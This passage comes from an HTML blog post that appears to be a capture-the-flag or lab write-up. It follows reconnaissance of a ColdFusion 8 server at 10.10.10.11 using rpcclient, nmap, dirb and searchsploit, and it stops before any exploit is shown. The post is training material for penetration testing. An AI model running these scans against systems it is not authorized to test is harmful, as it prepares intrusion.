data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/c4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!NyqZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png 424w, https://substackcdn.com/image/fetch/$s_!NyqZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png 848w, https://substackcdn.com/image/fetch/$s_!NyqZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png 1272w, https://substackcdn.com/image/fetch/$s_!NyqZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png 1456w" sizes="100vw"></picture><div></div></div></a><figcaption class="image-caption">rpcclient -U &#8220;&#8221; -N 10.10.10.11</figcaption></figure></div><p><em>No Bueno!</em></p><p>For the next part of enumeration, I attempt a service version scan using nmap <em>nmap -vvvvvv -sV 10.10.10.11</em>. That didn&#8217;t give me much, aside from telling me that 49154/tcp was also for msrpc.</p><blockquote><p>Updated port scan results:<br>135/tcp: msrpc<br>8500/tcp: ftmp* <br>49154/tcp: msrpc</p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yEe5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yEe5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png 424w, https://substackcdn.com/image/fetch/$s_!yEe5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png 848w, https://substackcdn.com/image/fetch/$s_!yEe5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png 1272w, https://substackcdn.com/image/fetch/$s_!yEe5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yEe5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/a4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!yEe5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png 424w, https://substackcdn.com/image/fetch/$s_!yEe5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png 848w, https://substackcdn.com/image/fetch/$s_!yEe5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png 1272w, https://substackcdn.com/image/fetch/$s_!yEe5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4c11a69-aa23-4891-8f71-a4ca4baa8a8e_800x619.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">nmap -vvvvv -sV 10.10.10.11</figcaption></figure></div><p>I think about port 8500, initially confusing it with 5900 (VNC), but decide to take a look and a simple Google search said ColdFusion.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!738t!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!738t!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png 424w, https://substackcdn.com/image/fetch/$s_!738t!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png 848w, https://substackcdn.com/image/fetch/$s_!738t!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png 1272w, https://substackcdn.com/image/fetch/$s_!738t!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!738t!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/043ae2c6-fbae-4b09-8443-258519550035_800x87.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!738t!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png 424w, https://substackcdn.com/image/fetch/$s_!738t!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png 848w, https://substackcdn.com/image/fetch/$s_!738t!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png 1272w, https://substackcdn.com/image/fetch/$s_!738t!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F043ae2c6-fbae-4b09-8443-258519550035_800x87.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">TCP Port 8500: ColdFusion Webserver</figcaption></figure></div><p>Bazinga!</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KidZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KidZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png 424w, https://substackcdn.com/image/fetch/$s_!KidZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png 848w, https://substackcdn.com/image/fetch/$s_!KidZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png 1272w, https://substackcdn.com/image/fetch/$s_!KidZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KidZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!KidZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png 424w, https://substackcdn.com/image/fetch/$s_!KidZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png 848w, https://substackcdn.com/image/fetch/$s_!KidZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png 1272w, https://substackcdn.com/image/fetch/$s_!KidZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4b5f99ef-aa4b-4880-af2f-f9d5e597d1ce_523x354.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s kick off dirb to automate some findings while we poke around.</p><blockquote><p>dirb <a href="http://10.10.10.11:8500">http://10.10.10.11:8500</a> /usr/share/dirb/wordlists/vulns/coldfusion.txt</p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!99x9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!99x9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png 424w, https://substackcdn.com/image/fetch/$s_!99x9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png 848w, https://substackcdn.com/image/fetch/$s_!99x9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png 1272w, https://substackcdn.com/image/fetch/$s_!99x9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!99x9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!99x9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png 424w, https://substackcdn.com/image/fetch/$s_!99x9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png 848w, https://substackcdn.com/image/fetch/$s_!99x9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png 1272w, https://substackcdn.com/image/fetch/$s_!99x9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F64da0061-464f-4ecf-9f89-0e2070352aa3_800x564.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">dirb <a href="http://10.10.10.11:8500">http://10.10.10.11:8500</a> /usr/share/dirb/wordlists/vulns/coldfusion.txt</figcaption></figure></div><p>Voila! We have not only positively fingerprinted this as ColdFusion, but we can also find the login page.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!gLdm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!gLdm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png 424w, https://substackcdn.com/image/fetch/$s_!gLdm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png 848w, https://substackcdn.com/image/fetch/$s_!gLdm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png 1272w, https://substackcdn.com/image/fetch/$s_!gLdm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!gLdm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/e7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!gLdm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png 424w, https://substackcdn.com/image/fetch/$s_!gLdm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png 848w, https://substackcdn.com/image/fetch/$s_!gLdm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png 1272w, https://substackcdn.com/image/fetch/$s_!gLdm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7650be6-a60d-439b-a372-3ccc9686ec8f_800x465.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h3>Methodology</h3><blockquote><p>Updated port scan and enumeration information:<br>135/tcp: msrpc<br>8500/tcp: ColdFusion8<br>49154/tcp: msrpc</p></blockquote><p>Now, we can see from our enumeration that rpc seems to be a no-go. Let&#8217;s focus on ColdFusion8. There are two ways to see where to go from here (without using Metasploit &#8212; I am attempting to avoid it to better prepare for the constraints of OSCP). First, we can query SearchSploit via <em>searchsploit coldfusion\ 8 </em>or we can search Exploit-db. Let&#8217;s do both.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Ept2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Ept2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png 424w, https://substackcdn.com/image/fetch/$s_!Ept2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png 848w, https://substackcdn.com/image/fetch/$s_!Ept2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png 1272w, https://substackcdn.com/image/fetch/$s_!Ept2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Ept2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Ept2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png 424w, https://substackcdn.com/image/fetch/$s_!Ept2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png 848w, https://substackcdn.com/image/fetch/$s_!Ept2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png 1272w, https://substackcdn.com/image/fetch/$s_!Ept2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1a9e666f-8bfd-4ba7-b6d6-391182d4a587_800x177.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption"><em>searchsploit coldfusion\ 8</em></figcaption></figure></div><p>We see a directory traversal vulnerability, but it only has Metasploit support. Let&#8217;s check the website.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Oirv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Oirv!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png 424w, https://substackcdn.com/image/fetch/$s_!Oirv!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png 848w, 